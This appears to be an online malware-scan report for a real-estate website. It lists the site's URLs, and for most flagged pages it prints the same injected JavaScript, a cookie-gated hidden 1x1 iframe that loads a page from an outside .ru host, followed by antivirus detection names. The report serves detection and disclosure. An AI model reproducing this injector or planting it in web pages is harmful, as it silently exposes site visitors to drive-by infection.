Request | Server response | Status |
http://somdattlandmarkmohali.com/ | 200 OK Content-Length: 9798 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function zzzfff() { var bujk = document.createElement('iframe'); bujk.src = 'http://qiqojahe.ru/count29.php'; bujk.style.position = 'absolute'; bujk.style.border = '0'; bujk.style.height = '1px'; bujk.style.width = '1px'; bujk.style.left = '1px'; bujk.style.top = '1px'; if (!document.getElementById('bujk')) { document.write('<div id=\'bujk\'></div>'); document.getElementById('bujk').appendChild(bujk); }}function SetCookie(cookieName,cookieValue,nDays,path) { var today = new Date(); v
... 259 bytes are skipped ... name ) { var start = document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');zzzfff();}}Antivirus reports:- AntiVir
- HTML/ExpKit.Gen3
- Avast
- JS:Iframe-AHU [Trj]
- nProtect
- Trojan.JS.Iframe.DEE
- K7AntiVirus
- Riskware
- Emsisoft
- Trojan.JS.Iframe.DEE (B)
- Comodo
- TrojWare.JS.Iframe.XM
- Kaspersky
- HEUR:Trojan.Script.Generic
- Microsoft
- Trojan:Win32/Quidvetis.A
- MicroWorld-eScan
- Trojan.JS.Iframe.DEE
- Fortinet
- JS/Iframe.DCV!tr.dldr
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- Trojan.JS.Iframe.DEE
- F-Prot
- JS/IFrame.RS.gen
- AVG
- HTML/Framer
- Norman
- Blacole.QH
- Sophos
- Troj/Iframe-JH
- GData
- Trojan.JS.Iframe.DEE
- Commtouch
- JS/IFrame.RS.gen
- BitDefender
- Trojan.JS.Iframe.DEE
|
http://somdattlandmarkmohali.com/res/x5engine.js | 200 OK Content-Length: 31937 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function zzzfff() { var mlkv = document.createElement('iframe'); mlkv.src = 'http://qiqojahe.ru/count29.php'; mlkv.style.position = 'absolute'; mlkv.style.border = '0'; mlkv.style.height = '1px'; mlkv.style.width = '1px'; mlkv.style.left = '1px'; mlkv.style.top = '1px'; if (!document.getElementById('mlkv')) { document.write('<div id=\'mlkv\'></div>'); document.getElementById('mlkv').appendChild(mlkv); }}function SetCookie(cookieName,cooki ...[805 bytes skipped]... Antivirus reports:- AntiVir
- HTML/ExpKit.Gen3
- Avast
- JS:Iframe-AHU [Trj]
- nProtect
- Trojan.JS.Iframe.DEE
- K7AntiVirus
- Riskware
- Emsisoft
- Trojan.JS.Iframe.DEE (B)
- Comodo
- TrojWare.JS.Iframe.XM
- Kaspersky
- HEUR:Trojan.Script.Generic
- Microsoft
- Trojan:Win32/Quidvetis.A
- MicroWorld-eScan
- Trojan.JS.Iframe.DEE
- Fortinet
- JS/Iframe.DCV!tr.dldr
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- Trojan.JS.Iframe.DEE
- F-Prot
- JS/IFrame.RS.gen
- AVG
- HTML/Framer
- Norman
- Blacole.QH
- Sophos
- Troj/Iframe-JH
- GData
- Trojan.JS.Iframe.DEE
- Commtouch
- JS/IFrame.RS.gen
- BitDefender
- Trojan.JS.Iframe.DEE
|
http://somdattlandmarkmohali.com/index.html | 200 OK Content-Length: 9798 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function zzzfff() { var bujk = document.createElement('iframe'); bujk.src = 'http://qiqojahe.ru/count29.php'; bujk.style.position = 'absolute'; bujk.style.border = '0'; bujk.style.height = '1px'; bujk.style.width = '1px'; bujk.style.left = '1px'; bujk.style.top = '1px'; if (!document.getElementById('bujk')) { document.write('<div id=\'bujk\'></div>'); document.getElementById('bujk').appendChild(bujk); }}function SetCookie(cookieName,cookieValue,nDays,path) { var today = new Date(); v
... 259 bytes are skipped ... name ) { var start = document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');zzzfff();}}Antivirus reports:- AntiVir
- HTML/ExpKit.Gen3
- Avast
- JS:Iframe-AHU [Trj]
- nProtect
- Trojan.JS.Iframe.DEE
- K7AntiVirus
- Riskware
- Emsisoft
- Trojan.JS.Iframe.DEE (B)
- Comodo
- TrojWare.JS.Iframe.XM
- Kaspersky
- HEUR:Trojan.Script.Generic
- Microsoft
- Trojan:Win32/Quidvetis.A
- MicroWorld-eScan
- Trojan.JS.Iframe.DEE
- Fortinet
- JS/Iframe.DCV!tr.dldr
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- Trojan.JS.Iframe.DEE
- F-Prot
- JS/IFrame.RS.gen
- AVG
- HTML/Framer
- Norman
- Blacole.QH
- Sophos
- Troj/Iframe-JH
- GData
- Trojan.JS.Iframe.DEE
- Commtouch
- JS/IFrame.RS.gen
- BitDefender
- Trojan.JS.Iframe.DEE
|
http://somdattlandmarkmohali.com/about_us.html | 200 OK Content-Length: 8192 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function zzzfff() { var bujk = document.createElement('iframe'); bujk.src = 'http://qiqojahe.ru/count29.php'; bujk.style.position = 'absolute'; bujk.style.border = '0'; bujk.style.height = '1px'; bujk.style.width = '1px'; bujk.style.left = '1px'; bujk.style.top = '1px'; if (!document.getElementById('bujk')) { document.write('<div id=\'bujk\'></div>'); document.getElementById('bujk').appendChild(bujk); }}function SetCookie(cookieName,cookieValue,nDays,path) { var today = new Date(); v
... 259 bytes are skipped ... name ) { var start = document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');zzzfff();}}Antivirus reports:- AntiVir
- HTML/ExpKit.Gen3
- Avast
- JS:Iframe-AHU [Trj]
- nProtect
- Trojan.JS.Iframe.DEE
- K7AntiVirus
- Riskware
- Emsisoft
- Trojan.JS.Iframe.DEE (B)
- Comodo
- TrojWare.JS.Iframe.XM
- Kaspersky
- HEUR:Trojan.Script.Generic
- Microsoft
- Trojan:Win32/Quidvetis.A
- MicroWorld-eScan
- Trojan.JS.Iframe.DEE
- Fortinet
- JS/Iframe.DCV!tr.dldr
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- Trojan.JS.Iframe.DEE
- F-Prot
- JS/IFrame.RS.gen
- AVG
- HTML/Framer
- Norman
- Blacole.QH
- Sophos
- Troj/Iframe-JH
- GData
- Trojan.JS.Iframe.DEE
- Commtouch
- JS/IFrame.RS.gen
- BitDefender
- Trojan.JS.Iframe.DEE
|
http://somdattlandmarkmohali.com/about_project.html | 200 OK Content-Length: 7006 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function zzzfff() { var bujk = document.createElement('iframe'); bujk.src = 'http://qiqojahe.ru/count29.php'; bujk.style.position = 'absolute'; bujk.style.border = '0'; bujk.style.height = '1px'; bujk.style.width = '1px'; bujk.style.left = '1px'; bujk.style.top = '1px'; if (!document.getElementById('bujk')) { document.write('<div id=\'bujk\'></div>'); document.getElementById('bujk').appendChild(bujk); }}function SetCookie(cookieName,cookieValue,nDays,path) { var today = new Date(); v
... 259 bytes are skipped ... name ) { var start = document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');zzzfff();}}Antivirus reports:- AntiVir
- HTML/ExpKit.Gen3
- Avast
- JS:Iframe-AHU [Trj]
- nProtect
- Trojan.JS.Iframe.DEE
- K7AntiVirus
- Riskware
- Emsisoft
- Trojan.JS.Iframe.DEE (B)
- Comodo
- TrojWare.JS.Iframe.XM
- Kaspersky
- HEUR:Trojan.Script.Generic
- Microsoft
- Trojan:Win32/Quidvetis.A
- MicroWorld-eScan
- Trojan.JS.Iframe.DEE
- Fortinet
- JS/Iframe.DCV!tr.dldr
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- Trojan.JS.Iframe.DEE
- F-Prot
- JS/IFrame.RS.gen
- AVG
- HTML/Framer
- Norman
- Blacole.QH
- Sophos
- Troj/Iframe-JH
- GData
- Trojan.JS.Iframe.DEE
- Commtouch
- JS/IFrame.RS.gen
- BitDefender
- Trojan.JS.Iframe.DEE
|
http://somdattlandmarkmohali.com/ruby_tower_-_2_bed_room.html | 200 OK Content-Length: 6852 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function zzzfff() { var bujk = document.createElement('iframe'); bujk.src = 'http://qiqojahe.ru/count29.php'; bujk.style.position = 'absolute'; bujk.style.border = '0'; bujk.style.height = '1px'; bujk.style.width = '1px'; bujk.style.left = '1px'; bujk.style.top = '1px'; if (!document.getElementById('bujk')) { document.write('<div id=\'bujk\'></div>'); document.getElementById('bujk').appendChild(bujk); }}function SetCookie(cookieName,cookieValue,nDays,path) { var today = new Date(); v
... 259 bytes are skipped ... name ) { var start = document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');zzzfff();}}Antivirus reports:- AntiVir
- HTML/ExpKit.Gen3
- Avast
- JS:Iframe-AHU [Trj]
- nProtect
- Trojan.JS.Iframe.DEE
- K7AntiVirus
- Riskware
- Emsisoft
- Trojan.JS.Iframe.DEE (B)
- Comodo
- TrojWare.JS.Iframe.XM
- Kaspersky
- HEUR:Trojan.Script.Generic
- Microsoft
- Trojan:Win32/Quidvetis.A
- MicroWorld-eScan
- Trojan.JS.Iframe.DEE
- Fortinet
- JS/Iframe.DCV!tr.dldr
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- Trojan.JS.Iframe.DEE
- F-Prot
- JS/IFrame.RS.gen
- AVG
- HTML/Framer
- Norman
- Blacole.QH
- Sophos
- Troj/Iframe-JH
- GData
- Trojan.JS.Iframe.DEE
- Commtouch
- JS/IFrame.RS.gen
- BitDefender
- Trojan.JS.Iframe.DEE
|
http://somdattlandmarkmohali.com/saphire_tower_-_3_bed_room.html | 200 OK Content-Length: 6858 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function zzzfff() { var bujk = document.createElement('iframe'); bujk.src = 'http://qiqojahe.ru/count29.php'; bujk.style.position = 'absolute'; bujk.style.border = '0'; bujk.style.height = '1px'; bujk.style.width = '1px'; bujk.style.left = '1px'; bujk.style.top = '1px'; if (!document.getElementById('bujk')) { document.write('<div id=\'bujk\'></div>'); document.getElementById('bujk').appendChild(bujk); }}function SetCookie(cookieName,cookieValue,nDays,path) { var today = new Date(); v
... 259 bytes are skipped ... name ) { var start = document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');zzzfff();}}Antivirus reports:- AntiVir
- HTML/ExpKit.Gen3
- Avast
- JS:Iframe-AHU [Trj]
- nProtect
- Trojan.JS.Iframe.DEE
- K7AntiVirus
- Riskware
- Emsisoft
- Trojan.JS.Iframe.DEE (B)
- Comodo
- TrojWare.JS.Iframe.XM
- Kaspersky
- HEUR:Trojan.Script.Generic
- Microsoft
- Trojan:Win32/Quidvetis.A
- MicroWorld-eScan
- Trojan.JS.Iframe.DEE
- Fortinet
- JS/Iframe.DCV!tr.dldr
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- Trojan.JS.Iframe.DEE
- F-Prot
- JS/IFrame.RS.gen
- AVG
- HTML/Framer
- Norman
- Blacole.QH
- Sophos
- Troj/Iframe-JH
- GData
- Trojan.JS.Iframe.DEE
- Commtouch
- JS/IFrame.RS.gen
- BitDefender
- Trojan.JS.Iframe.DEE
|
http://somdattlandmarkmohali.com/emrald_tower_-_3_bed_room.html | 200 OK Content-Length: 6856 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function zzzfff() { var bujk = document.createElement('iframe'); bujk.src = 'http://qiqojahe.ru/count29.php'; bujk.style.position = 'absolute'; bujk.style.border = '0'; bujk.style.height = '1px'; bujk.style.width = '1px'; bujk.style.left = '1px'; bujk.style.top = '1px'; if (!document.getElementById('bujk')) { document.write('<div id=\'bujk\'></div>'); document.getElementById('bujk').appendChild(bujk); }}function SetCookie(cookieName,cookieValue,nDays,path) { var today = new Date(); v
... 259 bytes are skipped ... name ) { var start = document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');zzzfff();}}Antivirus reports:- AntiVir
- HTML/ExpKit.Gen3
- Avast
- JS:Iframe-AHU [Trj]
- nProtect
- Trojan.JS.Iframe.DEE
- K7AntiVirus
- Riskware
- Emsisoft
- Trojan.JS.Iframe.DEE (B)
- Comodo
- TrojWare.JS.Iframe.XM
- Kaspersky
- HEUR:Trojan.Script.Generic
- Microsoft
- Trojan:Win32/Quidvetis.A
- MicroWorld-eScan
- Trojan.JS.Iframe.DEE
- Fortinet
- JS/Iframe.DCV!tr.dldr
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- Trojan.JS.Iframe.DEE
- F-Prot
- JS/IFrame.RS.gen
- AVG
- HTML/Framer
- Norman
- Blacole.QH
- Sophos
- Troj/Iframe-JH
- GData
- Trojan.JS.Iframe.DEE
- Commtouch
- JS/IFrame.RS.gen
- BitDefender
- Trojan.JS.Iframe.DEE
|
http://somdattlandmarkmohali.com/diamond_tower_-_4_br_+_servant_room.html | 200 OK Content-Length: 6244 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function zzzfff() { var bujk = document.createElement('iframe'); bujk.src = 'http://qiqojahe.ru/count29.php'; bujk.style.position = 'absolute'; bujk.style.border = '0'; bujk.style.height = '1px'; bujk.style.width = '1px'; bujk.style.left = '1px'; bujk.style.top = '1px'; if (!document.getElementById('bujk')) { document.write('<div id=\'bujk\'></div>'); document.getElementById('bujk').appendChild(bujk); }}function SetCookie(cookieName,cookieValue,nDays,path) { var today = new Date(); v
... 259 bytes are skipped ... name ) { var start = document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');zzzfff();}}Antivirus reports:- AntiVir
- HTML/ExpKit.Gen3
- Avast
- JS:Iframe-AHU [Trj]
- nProtect
- Trojan.JS.Iframe.DEE
- K7AntiVirus
- Riskware
- Emsisoft
- Trojan.JS.Iframe.DEE (B)
- Comodo
- TrojWare.JS.Iframe.XM
- Kaspersky
- HEUR:Trojan.Script.Generic
- Microsoft
- Trojan:Win32/Quidvetis.A
- MicroWorld-eScan
- Trojan.JS.Iframe.DEE
- Fortinet
- JS/Iframe.DCV!tr.dldr
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- Trojan.JS.Iframe.DEE
- F-Prot
- JS/IFrame.RS.gen
- AVG
- HTML/Framer
- Norman
- Blacole.QH
- Sophos
- Troj/Iframe-JH
- GData
- Trojan.JS.Iframe.DEE
- Commtouch
- JS/IFrame.RS.gen
- BitDefender
- Trojan.JS.Iframe.DEE
|
http://somdattlandmarkmohali.com/site_layout_plan.html | 200 OK Content-Length: 6825 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function zzzfff() { var bujk = document.createElement('iframe'); bujk.src = 'http://qiqojahe.ru/count29.php'; bujk.style.position = 'absolute'; bujk.style.border = '0'; bujk.style.height = '1px'; bujk.style.width = '1px'; bujk.style.left = '1px'; bujk.style.top = '1px'; if (!document.getElementById('bujk')) { document.write('<div id=\'bujk\'></div>'); document.getElementById('bujk').appendChild(bujk); }}function SetCookie(cookieName,cookieValue,nDays,path) { var today = new Date(); v
... 259 bytes are skipped ... name ) { var start = document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');zzzfff();}}Antivirus reports:- AntiVir
- HTML/ExpKit.Gen3
- Avast
- JS:Iframe-AHU [Trj]
- nProtect
- Trojan.JS.Iframe.DEE
- K7AntiVirus
- Riskware
- Emsisoft
- Trojan.JS.Iframe.DEE (B)
- Comodo
- TrojWare.JS.Iframe.XM
- Kaspersky
- HEUR:Trojan.Script.Generic
- Microsoft
- Trojan:Win32/Quidvetis.A
- MicroWorld-eScan
- Trojan.JS.Iframe.DEE
- Fortinet
- JS/Iframe.DCV!tr.dldr
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- Trojan.JS.Iframe.DEE
- F-Prot
- JS/IFrame.RS.gen
- AVG
- HTML/Framer
- Norman
- Blacole.QH
- Sophos
- Troj/Iframe-JH
- GData
- Trojan.JS.Iframe.DEE
- Commtouch
- JS/IFrame.RS.gen
- BitDefender
- Trojan.JS.Iframe.DEE
|
http://somdattlandmarkmohali.com/specification.html | 200 OK Content-Length: 6819 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function zzzfff() { var bujk = document.createElement('iframe'); bujk.src = 'http://qiqojahe.ru/count29.php'; bujk.style.position = 'absolute'; bujk.style.border = '0'; bujk.style.height = '1px'; bujk.style.width = '1px'; bujk.style.left = '1px'; bujk.style.top = '1px'; if (!document.getElementById('bujk')) { document.write('<div id=\'bujk\'></div>'); document.getElementById('bujk').appendChild(bujk); }}function SetCookie(cookieName,cookieValue,nDays,path) { var today = new Date(); v
... 259 bytes are skipped ... name ) { var start = document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');zzzfff();}}Antivirus reports:- AntiVir
- HTML/ExpKit.Gen3
- Avast
- JS:Iframe-AHU [Trj]
- nProtect
- Trojan.JS.Iframe.DEE
- K7AntiVirus
- Riskware
- Emsisoft
- Trojan.JS.Iframe.DEE (B)
- Comodo
- TrojWare.JS.Iframe.XM
- Kaspersky
- HEUR:Trojan.Script.Generic
- Microsoft
- Trojan:Win32/Quidvetis.A
- MicroWorld-eScan
- Trojan.JS.Iframe.DEE
- Fortinet
- JS/Iframe.DCV!tr.dldr
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- Trojan.JS.Iframe.DEE
- F-Prot
- JS/IFrame.RS.gen
- AVG
- HTML/Framer
- Norman
- Blacole.QH
- Sophos
- Troj/Iframe-JH
- GData
- Trojan.JS.Iframe.DEE
- Commtouch
- JS/IFrame.RS.gen
- BitDefender
- Trojan.JS.Iframe.DEE
|
http://somdattlandmarkmohali.com/project_video.html | 200 OK Content-Length: 4084 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function zzzfff() { var bujk = document.createElement('iframe'); bujk.src = 'http://qiqojahe.ru/count29.php'; bujk.style.position = 'absolute'; bujk.style.border = '0'; bujk.style.height = '1px'; bujk.style.width = '1px'; bujk.style.left = '1px'; bujk.style.top = '1px'; if (!document.getElementById('bujk')) { document.write('<div id=\'bujk\'></div>'); document.getElementById('bujk').appendChild(bujk); }}function SetCookie(cookieName,cookieValue,nDays,path) { var today = new Date(); v
... 259 bytes are skipped ... name ) { var start = document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');zzzfff();}}Antivirus reports:- AntiVir
- HTML/ExpKit.Gen3
- Avast
- JS:Iframe-AHU [Trj]
- nProtect
- Trojan.JS.Iframe.DEE
- K7AntiVirus
- Riskware
- Emsisoft
- Trojan.JS.Iframe.DEE (B)
- Comodo
- TrojWare.JS.Iframe.XM
- Kaspersky
- HEUR:Trojan.Script.Generic
- Microsoft
- Trojan:Win32/Quidvetis.A
- MicroWorld-eScan
- Trojan.JS.Iframe.DEE
- Fortinet
- JS/Iframe.DCV!tr.dldr
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- Trojan.JS.Iframe.DEE
- F-Prot
- JS/IFrame.RS.gen
- AVG
- HTML/Framer
- Norman
- Blacole.QH
- Sophos
- Troj/Iframe-JH
- GData
- Trojan.JS.Iframe.DEE
- Commtouch
- JS/IFrame.RS.gen
- BitDefender
- Trojan.JS.Iframe.DEE
|
http://somdattlandmarkmohali.com/test404page.js | 404 Not Found Content-Length: 11812 Content-Type: text/html | clean |
http://code.jquery.com/jquery-1.9.1.js | 200 OK Content-Length: 268381 Content-Type: application/x-javascript | clean |
http://somdattlandmarkmohali.com/cgi-sys/js/simple-expand.min.js | 200 OK Content-Length: 2782 Content-Type: application/javascript | clean |